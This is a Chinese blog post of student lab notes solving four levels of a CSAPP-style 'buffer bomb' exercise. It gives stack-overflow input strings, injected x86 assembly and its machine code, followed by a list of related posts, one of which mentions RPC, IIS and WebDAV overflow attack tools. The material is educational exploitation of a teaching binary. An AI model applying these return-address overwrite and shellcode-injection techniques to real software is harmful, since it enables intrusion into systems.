缓冲区炸弹

已于 2022-03-30 21:03:19 修改
阅读量534 收藏 1
点赞数
分类专栏: 笔记 文章标签: 其他
于 2022-03-24 22:57:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52865021/article/details/123722862
版权

栈溢出 内存篡改 汇编指令 机器代码 安全漏洞
关键词由CSDN通过智能技术生成

关键是知道栈里都放了一些什么就行

第一关

在这里插入图片描述
故将想要返回的地址覆盖到“返回到test的地址”上即可
故密码为:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 11 40 00
(注意小端格式)

第二关

在这里插入图片描述
通行密码为0X32C17CEB,将[esp+8]处修改为该值即可
在这里插入图片描述
依旧是覆盖“返回到test的地址”
返回后的栈为
在这里插入图片描述
覆盖“4个字节”为通行密码即可
故密码为:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 40 00 00 00 00 00 EB 7C C1 32

第三关

要修改全局变量 _global_value
在这里插入图片描述
在这里插入图片描述
eax里存的我们输入字符串的位置地址
故我们跳进eax,执行我们的机器代码即可
汇编指令:

mov eax,0x32C17CEB
mov [0x409004],eax
push 0x401250
retn

机器代码:
B8EB7CC132A3049040006850124000C3

故密码为:B8 EB 7C C1 32 A3 04 90 40 00 68 50 12 40 00 C3 74 FE 19 00

第四关

不仅要修改全局变量_global_value,还要恢复栈,很明显空间根本不够,考虑两次调用getbuf(0x401130)
第一次调用getbuf
在这里插入图片描述
在这里插入图片描述

跳进eax: 0x0019fe74
汇编指令:

sub esp,0x20
push 0x401130
ret

机器代码:

83EC206830114000C3

保持ebp的值不变:
在这里插入图片描述
第二次调用getbuf的栈:
在这里插入图片描述
汇编指令:

mov eax,0x32C17CEB
push 0x19FE70
retn

机器代码:

B8EB7CC1326870FE1900C3

其中 0x19FE70 可以通过查看栈信息找到,即存放下一个机器代码的位置
在这里插入图片描述
注意此时的eax值已经改变,要用已经改变的,同时依旧保持ebp的值。

保存ebp(test中的):
在这里插入图片描述
0x19FE70处的汇编代码:

mov ebp,0x19FE94
push 0x4012A0
ret

机器代码:

BD94FE190068A0124000C3

之后进入第四关,最后有一个retn,地址即为20字节后的四个字节,此时我要找一个新的地方,方便我缓冲区溢出成功,于是找了0x19FE80这个位置
恰好是在我输入完前面所以字符串之后的位置,故紧跟着输入我想输入的
汇编指令:

mov [0x00409004],eax
push 0x401181
retn

机器代码:

B8EB7CC1326881114000C3

在这里插入图片描述
输出缓冲区溢出成功的位置:0x401181

故密码为:83 EC 20 68 30 11 40 00 C3 00 00 00 94 fe 19 00 74 fe 19 00
(这里有一个换行符)
B8 EB 7C C1 32 68 70 FE 19 00 C3 00 94 fe 19 00 58 fe 19 00 80 FE 19 00 A3 04 90 40 00 BD 94 FE 19 00 68 A0 12 40 00 C3 B8 EB 7C C1 32 68 81 11 40 00 C3

첫 만남(初相识)
关注
专栏目录
CSAPP实验三:缓冲区溢出炸弹(Buflab)
CNFINITE的博客
08-12 8853
本系列文章为中国科学技术大学计算机专业学科基础课《计算机系统》布置的实验,上课所用教材和内容为黑书CSAPP,当时花费很大精力和弯路,现来总结下各个实验,本文章为第三个实验——缓冲区溢出炸弹(Buflab)。 一、实验名称:buflab 二、实验学时: 3 三、实验内容和目的: 掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使得程序执行我们所期望的过程 四、实验原理: 溢出的字符将覆盖栈帧上的数据 特...
缓冲区
baidu_41922630的博客
10-21 1640
计算机中的缓冲区: 缓冲器为暂时置放输出或输入资料的内存。 缓冲器内资料自储存设备(如硬盘)来,放置在缓冲器中,须待机送至CPU或其他运算设备。 缓冲区(buffer)这个中文译意源自当计算机的高速部件与低速部件通讯时,必须将高速部件的输出暂存到某处,以保证高速部件与低速部件相吻合. 后来这个意思被扩展了,成为"临时存贮区"的意思。 当然,上面是计算机上的缓冲区,总的来说计算机中的缓冲区就是...
二进制缓冲区溢出炸弹
学习记录
04-10 2746
把反汇编代码分享给大家参考 链接:https://pan.baidu.com/s/1iZXI4mOkX9bv84ZvMpJplw 提取码:u4dp
计算机系统实验-缓冲区炸弹
Hopeace的博客
03-16 1312
计算机系统实验-缓冲区炸弹概述Trojan1Trojan2Trojan3Trojan4 概述 攻击指令:0XDDDBBFFF #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> int getbuf(void); void test(void); int cookie=0x11223344; unsigned long rand1_h,rand1_l,
当心你的终端输入缓冲区里遗留的炸弹
Netfilter
06-13 6969
来看一个程序: #include <stdio.h> int main (int argc, char **argv) { char buf[1]; //syscall(0, 0, buffer, 1); read(0, buf, sizeof(buf)); printf("buf is: %s\n", buf); return 0; } 我这里不谈什么缓冲区溢出,也和各种漏洞无关,我这里说的仅仅是一个操作习惯,或者说编程习惯问题。 问题,输入abc会发生什么? 看看答案: [r
计算机系统基础:缓冲区炸弹实验
qq_45664450的博客
01-17 1470
第一关smoke: 查询到:08048c18 : 即smoke首地址为0x8048c18,根据getbuf的汇编代码,可得buf缓冲区大小有0x28个字节,可得攻击字符串为0x28+4+4=48个字节,且最后四个字节为smoke的地址。攻击字符串为: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
利用c语言来的数组的溢出实现缓冲区炸弹,内存地址指针
最新发布
08-02
利用c语言来的数组的溢出实现缓冲区炸弹,内存地址指针
C语言数组溢出:缓冲区炸弹与内存地址技巧
资源摘要信息:"在本文中,我们将详细探讨如何利用C语言中的数组溢出和内存地址指针来实现所谓的'缓冲区炸弹'。这个问题主要涉及到C语言程序的安全性,特别是内存管理和数据操作方面的薄弱环节。理解这一概念对于编写...
Windows版本的二进制炸弹文件
08-26
CSAPP大名鼎鼎了,网上许多人都完成了其独具特色的实验,特别是二进制炸弹缓冲区炸弹等。 二进制炸弹实验,主要锻炼学习者使用反汇编工具对二进制可执行程序调试、分析的能力。学习者首先需要使用调试器调试bomb...
计算机系统实验:二进制炸弹+缓冲区炸弹 (自我学习笔记)
weixin_52867134的博客
03-25 2344
本来没想写个博客,结果得知还要验收,发现自己全忘了,那就趁着复习的功夫再捋一遍吧>-< 一、使用工具:IDA-pro 简单使用方式: 1、打开IDA,open需要反汇编的exe。 选则win32debugger,process option可以传入命令行参数(该实验中为学号)。 2、F9会运行exe,直到断点停止。F8 step over, F7 step into; F5显示C代码(32bit的IDA有,64位没有) 3、展示出的汇编指令为x86,采用Inter格式 ,noA...
缓冲区溢出实验(The Buffer Bomb)解答及实验报告
04-13
CMU的缓冲区溢出实验(The Buffer Bomb) 我的解答及实验报告
缓冲区溢出实验
12-01
1、利用RPC漏洞建立超级用户 利用工具scanms.exe文件检测RPC漏洞,利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。 2、利用IIS溢出进行攻击 利用软件Snake IIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口。 3、利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。
CSAPP实验四----缓冲区溢出实验bufbomb
热门推荐
FatWhale
05-25 1万+
在网上关于这个的实验有几个版本,这个版本只有三关,都比较基础,为了不让大家混淆,对本实验做一下说明: 文件说明     1. bufbomb : 主程序,有四个选项,最常用的是 -t ,后面加自己的姓名等,运行时会根据加入的参数生成cookie,第二关和第三关都会用到。     2.  sendstring :  翻译程序,实验要求将字符转化成ascii码输入,两位输入,即想输入0也要输
CSAPP 缓冲区溢出炸弹 中科大实验
weixin_44639164的博客
11-08 1046
中科大CSAPP实验三缓冲区溢出炸弹
保姆级缓冲区炸弹破解教程
Hellsegamosken
03-14 1712
四个关卡本身不算难,而且有提示,在已经有二进制炸弹基础的情况下这绝对是保姆级教程了。但是有个非常鬼畜的第 0 关。我刚上手的时候就开始做第 0 关,结果做了一个多小时还是不能再不劫持控制的情况下过关,没想到后面的关卡反而简单了。 建议通关顺序:1-2-3-0-4。 先不管第几关第几关,先把程序的栈结构理一下: 嗯,还是比较清楚的。我们开始写入的地方就是 buf。注意用 _alloca 在栈中申请空间字节数量是 4 的倍数(当然在动调下这些都不是问题): 第一个木马最后是调用了 exit(0),因此无需维
缓冲区炸弹学习笔记
m0_59686868的博客
03-20 241
缓冲区炸弹笔记
实验三-Bufflab(缓冲区溢出攻击、buffbomb/buffbomb)实验总结
longzaizai_的博客
05-03 7115
实验准备工作和踩坑总结(实验过程中有一些坑总结在前边): 准备工作: 1.首先,我将userid设置为:sxl,如图所示: 正在上传…重新上传取消 因此可以得到专属于我的cookie:0x45f61b8d。 2.然后,因为在后续试验中我们要用到bufbomb的汇编代码,因此在终端依次输入命令: (1)ssh username@10.92.13.8连接到服务器 (2)objdump -d bufbomb > 1.txt (3)scp username@10.92.8:1.tx...
The Buffer Bomb
ymm
06-22 1567
Lab2 缓冲炸弹一 问题描述      本题利用程序留出的输入缓冲区,将输入数据转换成字符串存放在栈区中,当输入字符串长度大于预留的缓冲大小时,多出的部分将覆盖栈帧中的其他内容,从而达到改变程序运行顺序,甚至添加其他程序修改数据等目的。二 解题思路1、  level 0实验要求:改变程序的原始执行顺序,使程序在执行完getbuf后返回到smoke函数处运行。解决本题,重要的是理解栈帧的形成,以及...
bufbomb关于缓冲区溢出攻击
leafdown_的博客
11-23 2561
smoke 要求:构造攻击字符串作为目标程序输入,造成缓冲区溢出,使getbuf()返回时不返回到test函数,而是转向执行smoke 思路: 理解了getbuf栈的构成:开辟的空间[1][2][3]…[32]+rbp+返回地址 只需要把getbuf返回的地址设置为smoke地址即可(开始的时候因为不理解栈的结构,发懵了很久) 第一步:确定开辟空间大小00000000004018b9 <g
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值